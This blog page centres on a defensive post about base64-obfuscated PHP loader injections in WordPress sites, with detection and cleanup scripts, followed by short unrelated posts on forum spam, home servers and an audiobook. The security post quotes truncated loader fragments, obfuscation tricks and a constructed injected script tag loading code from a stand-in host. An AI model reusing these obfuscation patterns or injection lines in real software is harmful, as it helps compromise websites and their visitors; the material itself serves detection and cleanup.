Base 64 code injection in a lot of sites

A lot of websites seem to suffer from injected files; it also happened to a few of my own sites. Apparently the attackers use holes in the site's code to get in. It is a tactic that has been going on for at least a year, if not longer.

1. How can you check whether you are infected?

1) A good “trick” (although reactive and dependent on Google) is to use Google Chrome to surf to one of your websites. If “protection against phishing and malware” is switched on under Chrome's privacy settings, there is a good chance you will get the following notice:

image

It means that Google has found the injected code. In Google Webmaster Tools you will then find a list of the affected files it found, which is handy for going straight to the right file. (In my case a PHP file had been uploaded into one of my image upload directories.)

2) You see strange behaviour on your site, e.g. a footer that gives an error message. Check your footer.php, or the code that generates the footer, for injected JavaScript includes. The injected code is usually placed at the far right of a long line, so you might need to scroll your editor window to the right to see it.

3) Use a virus scanner that knows these injections and run it over your web roots.

4) Run a script that checks your PHP files for base64-encoded payloads (see below).

5) If you run an intrusion detection system, either a light one like the WordPress File Monitor plugin that mails you when files have changed or a heavier host-based IDS, well… it will notify you (sometimes).

6) You can schedule security audits of your installation; that might also help to inform you about security issues.

2. What is actually done on your server?

2.1 additional php files are placed

First, .php files will have been placed at random locations throughout your directory structure; these contain the actual malicious code that calls out to the attacker's servers.

They carry random or plausible-looking names so that you cannot pick them out by name alone (jquery-bgiframe-min.php and jquery.lavalamp.php mimic real jQuery plugins, for example). A few names I encountered, out of a long list:

  • coven.php (6k)
  • fileNice.php (4k)
  • poofy.php (6k)
  • tc_general.php (6k)
  • utilities.php (3k)
  • aviso.php (6k)
  • etape.php (15k)
  • input.php (4k)
  • jquery-bgiframe-min.php (4k)
  • order.php (8k)
  • backgroundImage.php (4k)
  • dumky.php (14k)
  • frond.php (7k)
  • jquery.lavalamp.php (4k)
  • markt.php (4k)
  • expand.php (3k)
  • func2.php (4k)
  • haugh.php (7k)
  • ja.catslwi.php (7k)
  • vault.php (6k)
  • etc… etc…

They all have permission mode 644, so they cannot be picked out by inspecting permissions UNLESS your other files are not 644. If that is the case detecting them is very easy, but then your files were not secured properly in the first place (I assume).

They all carry the modification date and time of the other files in that specific directory, so you cannot identify them by timestamp; the tool behind it probably sets the timestamp to match its neighbours (touch -r does exactly that). What it cannot forge without root is the inode change time, so the ctime shown by stat may still reveal when the file was really written. (Maybe you could run a script that gives each file an increasing date to spot strange additions more easily next time, but a hash manifest of your web root is a more robust baseline: a forged timestamp does not change a file's hash.)
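As an added example (not part of the original post, and not the file monitor plugin mentioned above): a SHA-256 manifest of the web root, taken while the site is known-clean and stored somewhere the web server cannot write, finds both a dropped loader and an appended include even when their timestamps have been copied from a neighbouring file. The web root, file names and contents in the demo are constructed; the manifest functions are the part you would run against a real site.

```python
import hashlib
import os
import tempfile


def sha256_of(path):
    """SHA-256 of a file's contents, read in chunks."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def build_manifest(root):
    """Map every regular file under root (path relative to root) to its hash.
    Keep the result outside the web root, or the attacker can update it too."""
    manifest = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            manifest[rel] = sha256_of(full)
    return manifest


def compare_manifests(baseline, current):
    """Added, removed and modified paths between two manifests."""
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "modified": sorted(p for p in baseline
                           if p in current and baseline[p] != current[p]),
    }


def demo():
    """Constructed scenario: baseline a tiny web root, replay the injection
    described above (a dropped loader plus an appended include, both given
    the neighbouring file's timestamp), then diff the manifests."""
    with tempfile.TemporaryDirectory() as root:
        theme = os.path.join(root, "wp-content", "themes", "mytheme")
        os.makedirs(theme)
        index = os.path.join(root, "index.php")
        footer = os.path.join(theme, "footer.php")
        with open(index, "w") as fh:
            fh.write("<?php require 'wp-blog-header.php'; ?>\n")
        with open(footer, "w") as fh:
            fh.write("<?php wp_footer(); ?>\n")
        baseline = build_manifest(root)

        # The attacker drops a loader and appends an include to footer.php ...
        dropped = os.path.join(theme, "poofy.php")
        with open(dropped, "w") as fh:
            fh.write("<?php eval(gzuncompress(base64_decode('...'))); ?>\n")
        with open(footer, "a") as fh:
            fh.write("<?php include 'poofy.php'; ?>\n")
        # ... and copies index.php's timestamps onto both (what touch -r does).
        ref = os.stat(index)
        for path in (dropped, footer):
            os.utime(path, ns=(ref.st_atime_ns, ref.st_mtime_ns))

        mtime_forged = os.stat(dropped).st_mtime_ns == ref.st_mtime_ns
        return compare_manifests(baseline, build_manifest(root)), mtime_forged


if __name__ == "__main__":
    diff, forged = demo()
    print("dropped file carries the neighbour's mtime:", forged)
    for kind, paths in diff.items():
        print("%-9s %s" % (kind, ", ".join(paths) or "-"))
```

On a real site, run build_manifest() once after a clean install or a verified cleanup, save the dictionary (as JSON, for instance) off the server, and compare against a fresh manifest from cron; anything in "added" or "modified" that you did not upload yourself deserves a look, whatever its timestamp says.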

In most cases the code in these files is obfuscated: the real payload is base64 encoded (usually gzip-compressed as well) and only decoded at run time, right before it is passed to eval().

Some examples of the simpler base64-encoded eval() calls seen in these files (each sample is cut off where the encoded blob starts):

```php
// the decoder chain called openly: the blob is base64, then zlib-compressed
eval(gzuncompress(base64_decode('
// function names written backwards and reversed at run time:
// strrev("sserpmocnuzg") == "gzuncompress", strrev("edoced_46esab") == "base64_decode"
$fr = strrev("sserpmocnuzg"); $df = strrev("edoced_46esab"); eval($fr($df('
$v1 = strrev("edoced_46esab"); $v2 = strrev("sserpmocnuzg"); eval($v2($v1('
$cares = strrev("edoced_46esab"); eval(gzuncompress($cares('
// function names split into array pieces and concatenated:
// $sb[0].$sb[1] == "gzuncompress", $sa[1].$sa[0] == "base64_decode"
$sa = array('4_decode','base6'); $sb = array('gzunco','mpress') ;$t1 = $sb[0].$sb[1]; $t2 = $sa[1].$sa[0]; $tfi = array('
// both tricks combined: the pieces are reversed as well
$a1 = array("edoced_","46esab"); $a2 = array("sser","pmocnuzg") ; $a3 = array('
```

Some examples of more advanced variants, which hide the payload behind helper functions and lookup tables and use a lot of “innovative” garbling of the function names (again cut off at the start of the data):

```php
// a helper that rebuilds strings from a table of base64-encoded fragments:
// 'Xw==' is "_", 'XCI=' is '\"', 'XFw=' is "\\", 'Lw==' is "/", 'Ly8=' is "//", 'Lg==' is "."
function authcode($i){$a=Array('
function fuck($i){$a=Array('','Xw==','Xw==','XFxcIg==','XCI=','XFwn','Jw==','XFxcXA==','XFw=','XA==','Lw==','Ly8=','Lg==',
// a table of function names, each split into pieces so that no name appears whole
// in the file; read together they show what the payload does: fetch remote content
// (curl_*, file_get_contents), rewrite it (preg_replace, eregi), send fake headers
// (header, gmdate), run commands (system) and drop files (fopen, fwrite, fclose)
$GLOBALS['_figu_']=Array('' .'f' .'uncti' .'on_exi' .'sts','fun' .'ction_exists','cu' .'rl_init','c' .'url_set' .'opt','' .'curl_' .'se' .'t' .'opt','' .'cu' .'r' .'l_seto' .'pt','curl_set' .'o' .'pt','cu' .'rl_' .'setopt','c' .'u' .'rl' .'_setopt','curl_setopt','cur' .'l_exec','c' .'ur' .'l_cl' .'ose','i' .'n' .'i_g' .'et','fil' .'e_get_' .'co' .'n' .'ten' .'ts','fun' .'ction_exists','p' .'reg_' .'re' .'p' .'lace','e' .'re' .'gi','ere' .'gi','eregi','strlen','set_' .'time_limit','' .'i' .'ni_s' .'et','erro' .'r_re' .'p' .'o' .'r' .'tin' .'g','header','header','gmda' .'te','he' .'ade' .'r','header','h' .'e' .'ad' .'er','' .'date','system','date','fil' .'e' .'_e' .'xists','f' .'o' .'pen','f' .'close','fi' .'le' .'_' .'exists','rand','fopen','f' .'wr' .'ite','' .'f' .'c' .'lose','' .'bas' .'e64_de' .'code','' .'f' .'ile_get_' .'c' .'onten' .'ts','file','t' .'rim','fo' .'pe' .'n','f' .'write','' .'fclose'); ?>
```

So as you can see they are difficult to detect by simply scanning the files for base64_decode. Someone has written a script to detect base64 encodings (see below) but I have not tried that one yet; I don’t know whether it will detect all possible obfuscations.
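The scanner below is an added example, written for this page; it is not the script the author refers to and not code from the original post. Its heuristics are mine and follow the samples above: a direct eval(...base64_decode(...)) call, watched function names that are never written out but reassemble when the file's string literals are joined (forwards, backwards, or with each literal reversed, which covers both the strrev() and the array-pieces tricks), long base64 blobs, document.write(unescape()) in JavaScript, and very long lines. The four sample files are constructed from the patterns above with shortened payloads.

```python
import os
import re

# Decoders and executors that the loaders on this page hide from a plain
# grep. A legitimate file calls them openly, if at all; a loader spells
# them backwards or glues them together from pieces at run time.
WATCH = {"base64_decode", "gzuncompress", "gzinflate", "str_rot13",
         "eval", "system", "passthru", "shell_exec", "curl_exec"}

STRING_LIT = re.compile(r"'((?:[^'\\]|\\.)*)'" + r'|"((?:[^"\\]|\\.)*)"', re.S)
DIRECT_EVAL = re.compile(r"\beval\s*\(\s*(?:\w+\s*\(\s*)*base64_decode\s*\(", re.I)
VISIBLE_CALL = re.compile(r"\b(\w+)\s*\(")
BASE64_BLOB = re.compile(r"['\"]([A-Za-z0-9+/=]{200,})['\"]")
JS_WRITE = re.compile(r"document\.write\s*\(\s*unescape\s*\(")
LONG_LINE = 500  # a line this long in a theme or plugin file is worth a look


def string_literals(src):
    return [single or double for single, double in STRING_LIT.findall(src)]


def hidden_names(src):
    """Watched names the file uses without ever writing them out. All string
    literals are joined in the four orders the samples use, so that both
    strrev("edoced_46esab") and array('4_decode','base6') reassemble into
    base64_decode; names that also appear as a plain call were never hidden
    and are dropped (DIRECT_EVAL catches the open form)."""
    lits = string_literals(src)
    rev = [s[::-1] for s in lits]
    texts = ["".join(lits), "".join(reversed(lits)),
             "".join(rev), "".join(reversed(rev))]
    found = {name for text in texts for name in WATCH if name in text}
    return found - set(VISIBLE_CALL.findall(src))


def scan_source(src):
    """Human-readable findings for the contents of one file; [] if clean."""
    findings = []
    if DIRECT_EVAL.search(src):
        findings.append("eval() of a base64_decode()d payload")
    for name in sorted(hidden_names(src)):
        findings.append("hidden function name: " + name)
    for blob in BASE64_BLOB.findall(src):
        findings.append("base64 blob of %d chars" % len(blob))
    if JS_WRITE.search(src):
        findings.append("document.write(unescape(...)) script injection")
    longest = max((len(line) for line in src.splitlines()), default=0)
    if longest > LONG_LINE:
        findings.append("line of %d chars, scroll right" % longest)
    return findings


def scan_tree(root, exts=(".php", ".js", ".htaccess")):
    """{relative path: findings} for every flagged file under root."""
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.endswith(exts):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                findings = scan_source(fh.read())
            if findings:
                hits[os.path.relpath(path, root)] = findings
    return hits


# Constructed samples: the loader patterns quoted above with the payloads
# shortened or replaced by filler, plus one clean theme file.
CLEAN_FOOTER = ('<?php\n/* footer.php of a theme: nothing hidden here */\n?>\n'
                '<div id="footer"><?php wp_footer(); ?></div>\n')
STRREV_LOADER = ('<?php\n$fr = strrev("sserpmocnuzg"); $df = strrev("edoced_46esab");\n'
                 "eval($fr($df('eJwLycgsVgCi4sKS1GRdAFsZB5k=')));\n")
ARRAY_LOADER = ("<?php\n$sa = array('4_decode','base6'); $sb = array('gzunco','mpress');\n"
                "$t1 = $sb[0].$sb[1]; $t2 = $sa[1].$sa[0];\n"
                "eval($t1($t2('" + "QUFB" * 60 + "')));\n")
INJECTED_JS = ("/*! jQuery bgiframe plugin (legitimate code, shortened) */\n"
               "(function($){ $.fn.bgiframe = function(){ return this; }; })(jQuery);\n"
               + " " * 600 +
               "document.write(unescape('%3Cscript src=%22http://example.invalid/"
               "poofy.php%22%3E%3C/script%3E'));\n")

if __name__ == "__main__":
    for label, src in [("clean footer.php", CLEAN_FOOTER), ("strrev loader", STRREV_LOADER),
                       ("array loader", ARRAY_LOADER), ("jquery .js with appended line", INJECTED_JS)]:
        print(label, "->", scan_source(src) or "clean")
```

Run scan_tree("/var/www/yoursite") and review the hits by hand: a hidden decoder name or a document.write(unescape()) is close to a certainty, while a single long line or one base64 blob also shows up in minified libraries and embedded images, so treat those as triage, not verdict.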

2.2 calls to these php files are inserted in your php code

Next, JavaScript-based calls to these files are inserted (at random) into:

  • your existing php files
  • your existing javascript (includes)

For WordPress I have seen inclusions both in core code (e.g. the bundled jQuery library files) and in custom code (e.g. theme footers), but also in many other places.

2.3 your .htaccess rules have been adjusted

Check every .htaccess file in your web root (not just the top-level one) for changes.

2.4 code disguised as jpg images is uploaded

You not only need to look at .php and .js files but also at images, since code can be hidden in those. The tip found here is to also check the options table in the database for references to such images.

2.5 additional ADMINistrators have been added

This scares the shit out of you but it happened on one of my WordPress installations: I saw an extra admin …

2.6 code may have been injected in your content e.g. pages and posts
Search your content (the posts table) for patterns like <iframe>, <script> and hidden elements (style="display:none"); a lot of variations are used here.
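Added example, not from the original post: the database-side checks of sections 2.4 to 2.6 as SQL. It assumes the default wp_ table prefix (on a real install substitute your own prefix, which also changes the wp_capabilities meta key) and builds a constructed copy of the four tables involved in sqlite3 so that it runs offline; the LIKE queries run unchanged against MySQL.

```python
import sqlite3

# Patterns the post says to look for in page/post content (section 2.6),
# plus the two that betray dropped PHP loaders referenced from content.
CONTENT_PATTERNS = ["%<iframe%", "%<script%", "%display:none%",
                    "%display: none%", "%eval(%", "%base64_decode%"]
# Injected options usually carry a script tag or a base64 payload; text
# widgets and theme/plugin option rows are the usual victims.
OPTION_PATTERNS = ["%<script%", "%<iframe%", "%eval(%", "%base64_decode%"]


def find_injected_posts(conn):
    """(ID, post_title) of every post whose content matches a pattern."""
    where = " OR ".join("post_content LIKE ?" for _ in CONTENT_PATTERNS)
    sql = "SELECT ID, post_title FROM wp_posts WHERE " + where + " ORDER BY ID"
    return conn.execute(sql, CONTENT_PATTERNS).fetchall()


def find_suspicious_options(conn):
    """(option_id, option_name) of wp_options rows carrying injected code."""
    where = " OR ".join("option_value LIKE ?" for _ in OPTION_PATTERNS)
    sql = "SELECT option_id, option_name FROM wp_options WHERE " + where + " ORDER BY option_id"
    return conn.execute(sql, OPTION_PATTERNS).fetchall()


def list_administrators(conn):
    """Every account with the administrator role. WordPress keeps roles in
    wp_usermeta under the key '<prefix>capabilities' as a serialized array."""
    sql = """SELECT u.ID, u.user_login, u.user_registered
             FROM wp_users u JOIN wp_usermeta m ON m.user_id = u.ID
             WHERE m.meta_key = 'wp_capabilities'
               AND m.meta_value LIKE '%"administrator"%'
             ORDER BY u.ID"""
    return conn.execute(sql).fetchall()


def unexpected_admins(conn, known_logins):
    """Administrators you did not create yourself (section 2.5)."""
    return [row for row in list_administrators(conn) if row[1] not in known_logins]


def build_sample_db():
    """Constructed in-memory copy of the four tables: one clean post, two
    injected posts, one injected text widget and one rogue admin account."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE wp_posts (ID INTEGER PRIMARY KEY, post_title TEXT, post_content TEXT);
        CREATE TABLE wp_options (option_id INTEGER PRIMARY KEY, option_name TEXT, option_value TEXT);
        CREATE TABLE wp_users (ID INTEGER PRIMARY KEY, user_login TEXT, user_registered TEXT);
        CREATE TABLE wp_usermeta (umeta_id INTEGER PRIMARY KEY, user_id INTEGER, meta_key TEXT, meta_value TEXT);
    """)
    conn.executemany("INSERT INTO wp_posts VALUES (?, ?, ?)", [
        (1, "Hello world", "<p>Welcome to my blog.</p>"),
        (2, "About", '<p>About us.</p><div style="display:none"><a href="http://example.invalid/">x</a></div>'),
        (3, "Contact", '<p>Mail me.</p><iframe src="http://example.invalid/poofy.php" width="1" height="1"></iframe>'),
    ])
    conn.executemany("INSERT INTO wp_options VALUES (?, ?, ?)", [
        (1, "siteurl", "http://example.invalid"),
        (2, "blogname", "My blog"),
        (3, "widget_text", 'a:1:{i:2;a:2:{s:5:"title";s:0:"";s:4:"text";s:56:"<script src="http://example.invalid/poofy.php"></script>";}}'),
    ])
    conn.executemany("INSERT INTO wp_users VALUES (?, ?, ?)", [
        (1, "admin", "2009-01-05 10:00:00"),
        (2, "editor", "2009-06-01 09:30:00"),
        (3, "wpadm1n", "2010-03-12 03:14:07"),
    ])
    conn.executemany("INSERT INTO wp_usermeta VALUES (?, ?, ?, ?)", [
        (1, 1, "wp_capabilities", 'a:1:{s:13:"administrator";b:1;}'),
        (2, 2, "wp_capabilities", 'a:1:{s:6:"editor";b:1;}'),
        (3, 3, "wp_capabilities", 'a:1:{s:13:"administrator";b:1;}'),
    ])
    return conn


if __name__ == "__main__":
    db = build_sample_db()
    print("injected posts:", find_injected_posts(db))
    print("suspicious options:", find_suspicious_options(db))
    print("unexpected admins:", unexpected_admins(db, {"admin"}))
```

Against a real database, connect with your normal MySQL client instead of sqlite3 and paste the three SELECTs; if the rogue admin's user_registered date is after your last known-clean state, that date is also a useful lower bound for when the break-in happened.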

3. How to clean them up?

Currently I am cleaning them up one by one, since I own my own servers and can pretty easily run through the directory structure. I have also found a script that can check for base64 encodings, but I have not tried that one yet.

Of course you need to know WHAT code is vulnerable, possibly some plugins or maybe even some core code, given how widespread the infection is. I have not figured that out yet. It happens on a lot of platforms, including platforms that do not run WordPress but totally different software, so my guess is that it uses a library of possible zero-day security holes. Whatever the entry point is, cleaning the files without closing it, and without changing the FTP, admin and database passwords, usually just means the files come back.

4. More references

I am including a list of websites that have written about base64 encoded js injections:

  1. http://codex.wordpress.org/FAQ_My_site_was_hacked
  2. http://ocaoimh.ie/did-your-wordpress-site-get-hacked/
  3. http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/
  4. http://tipsforwordpress.com/php/code-injection/
  5. http://inspirated.com/2010/03/02/wordpress-ninoplas-virus-and-the-fix
  6. http://wordpress.org/support/topic/admin-blown-up-amp-possible-virus
  7. http://www.rvoodoo.com/projects/the-dreaded-base64-wordpress-hack-and-other-hacks-too/

5. Helpful WordPress Tools

  1. http://wordpress.org/extend/plugins/wordpress-file-monitor/

(this post is being updated)

Forum spam campaign going around

There seems to be some kind of Internet campaign to post on every forum and every thread that is even lightly political (even on WordPress plugins, sigh…) the message that "George Soros is a nazi" with some vague story around it.

To be honest I never heard of this guy until all these messages popped up. So I went to wikipedia to find out and… discovered a hero!

I’m glad that I read about this person it gives me some hope for a better future:

- Soros has been active as a philanthropist since the 1970s, when he began providing funds to help black students attend the University of Cape Town in apartheid South Africa, and began funding dissident movements behind the iron curtain.

- Soros’ philanthropic funding includes efforts to promote non-violent democratization in the post-Soviet states. These efforts, mostly in Central and Eastern Europe, occur primarily through the Open Society Institute (OSI) and national Soros Foundations, which sometimes go under other names (such as the Stefan Batory Foundation in Poland).

- Other notable projects have included aid to scientists and universities throughout Central and Eastern Europe, help to civilians during the siege of Sarajevo, and Transparency International. Soros also pledged an endowment of €420 million to the Central European University (CEU). The Nobel Peace Prize winner Muhammad Yunus and his microfinance bank Grameen Bank received support from the OSI.

- In an interview with The Washington Post on November 11, 2003, Soros said that removing President George W. Bush from office was the "central focus of my life" and "a matter of life and death." He said he would sacrifice his entire fortune to defeat President Bush, "if someone guaranteed it."[39] Soros gave $3 million to the Center for American Progress, $2.5 million to MoveOn.org, and [40] to America Coming Together. These groups worked to support Democrats in the 2004 election. On September 28, 2004 he dedicated more money to the campaign and kicked off his own multi-state tour with a speech: Why We Must Not Re-elect President Bush[41] delivered at the National Press Club in Washington, DC.

- In August 2009, Soros donated $35 million to the state of New York to be ear-marked for under-privileged children and given to parents who had benefit cards at the rate of $200 per child aged 3 through 17, with no limit as to the number of children that qualified. An additional $140 million was put into the fund by the state of New York from money they had received from the 2009 federal recovery act.[21]

- According to Neil Clark in the New Statesman, Soros’s role was crucial in the collapse of communism in Eastern Europe. Clark states that from 1979, Soros distributed $3m a year to dissidents including Poland’s Solidarity movement, Charter 77 in Czechoslovakia and Andrei Sakharov in the Soviet Union; in 1984, he founded his first Open Society Institute in Hungary and pumped millions of dollars into opposition movements and independent media.[44]

- Since the fall of the Soviet Union, Soros’ funding has continued to play an important role in the former Soviet sphere. His funding and organization of Georgia’s Rose Revolution was considered crucial to its success by Russian and Western observers, although Soros has said that his role has been "greatly exaggerated."[45] Alexander Lomaia, Secretary of the Georgian Security Council and former Minister of Education and Science, is a former Executive Director of the Open Society Georgia Foundation (Soros Foundation), overseeing a staff of 50 and a budget of $2,500,000.[46]

Former Georgian Foreign Minister Salomé Zourabichvili wrote that institutions like the Soros Foundation were the cradle of democratisation and that all the NGOs which gravitated around the Soros Foundation undeniably carried the revolution. She opines that after the revolution the Soros Foundation and the NGOs were integrated into power.[47]

Some Soros-backed pro-democracy initiatives have been banned in Kazakhstan and Turkmenistan.[48] Ercis Kurtulus, head of the Social Transparency Movement Association (TSHD) in Turkey, said in an interview that "Soros carried out his will in Ukraine and Georgia by using these NGOs…Last year Russia passed a special law prohibiting NGOs from taking money from foreigners. I think this should be banned in Turkey as well."[49] In 1997, Soros had to close his foundation in Belarus after it was fined $3 million by the government for "tax and currency violations". According to the New York Times, the Belarussian president Aleksandr Lukashenko has been widely criticized in the West and in Russia for his efforts to control the Belarus Soros Foundation and other independent NGOs and to suppress civil and human rights. Soros called the fines part of a campaign to "destroy independent society".[50]

In June 2009, Soros donated $100m to Central Europe and Eastern Europe to counter the impact of the economic crisis on the poor, voluntary groups and non-government organisations.[51]

- The Open Society Initiative for Southern Africa is a Soros-affiliated organization. [1] Its director for Zimbabwe is Godfrey Kanyenze, who also directs the Zimbabwe Congress of Trade Unions (ZCTU), which was the main force behind the founding of the Movement for Democratic Change, the principal indigenous organization promoting Regime change in Zimbabwe.

Etc… etc…

I know I’m probably showing my total ignorance by never having heard of him, since he is very rich, wrote quite some books and did all of this, but… you are never too old to learn :)

Thanks to the spammers for letting me find a new hero.

(I think it is time for my hero gallery on this weblog don’t you think?)

Where will my little cloud go

Cloud computing is Internet-based computing, whereby shared resources, software, and information are provided to computers and other devices on demand. (do you use gmail?)

I like "the cloud":

1. I can access my stuff from anywhere on any device
2. I don’t have to think about backups (and even can signup with cloud backup)
3. I don’t have to develop and maintain these apps myself, some other folks will add new functionality

However… I am already beginning to feel disadvantages:

1. The more services I sign up with (flickr, family+friends, dropbox, etc…) the more I pay per month altogether for this stuff (anticipating monthly subscriptions for the free services like webmail, and including my donations)
2. the more I "outsource" (instead of improving and maintaining the software / hardware myself) the more I lose control over security and privacy, but also over the functionality improvements I want.

So… this will probably drive me (and a lot of people like me) to a point where running your own server is still the most interesting option cost-wise. It means work each month to maintain the OS and the (open source) apps, and possibly writing my own stuff, but it will save me money in the end. Then again it will probably only be for the few lucky ones who can secure a Linux environment, do server optimization and are in general technically somewhat more able, because otherwise the time invested in learning how to do "all of this" is not worth the effort.

And… to bring these costs down even further… I think more and more people will probably buy a server, place it somewhere in their house and make it accessible from the outside world. Meaning: a lot of households will get little clouds.

I’m not saying anything new here; a certain group of people has been running these things since, uhm… the pre-Internet BBS era, and a lot of ‘Linux persons’ have been running their own servers for years and years, but… I think it will go mainstream now.

And uhm… I am also writing this to convince my wife that this new high-end server is absolutely needed, apart from our X other computers on our gigabit LAN with its own N terabyte storage capacity, because uhm… more services in the cloud for our household simply means: we need more powerful servers in house. So… uhm… in the end it will save us a lot of money :) (there is however the downside that maintenance and functional improvement DO mean some hours per month you have to set aside for these tasks) (luckily some people like this as a hobby) (and maybe there is a business opportunity in servicing the 99% out there who have no clue).

Audio Book of the month: The Gods of Mars


If you click on the bottom left of this page you can listen to the book "The Gods of Mars" (1918) by Edgar Rice Burroughs; when you click playlist you can click through the 22 chapters.

I’m starting this initiative to give some attention to Librivox where "all of us" can volunteer to read books that are in the public domain.


The book is the follow-up to A Princess of Mars and tells about the fantastic adventures of John Carter on Barsoom. (I loved the comics when I was a kid).


The audio book is available for free on Project Gutenberg’s audio book collection.

Since the number of free audio books is still small compared to the number of free books, consider joining Librivox, where you can volunteer to record chapters of books in the public domain. (On Librivox you can find more books in this John Carter series, and you can download The Gods of Mars there as well.)

This book was read by JD Weber and the total running time is 7:41:49.

Take a look at some recently finished audio books also!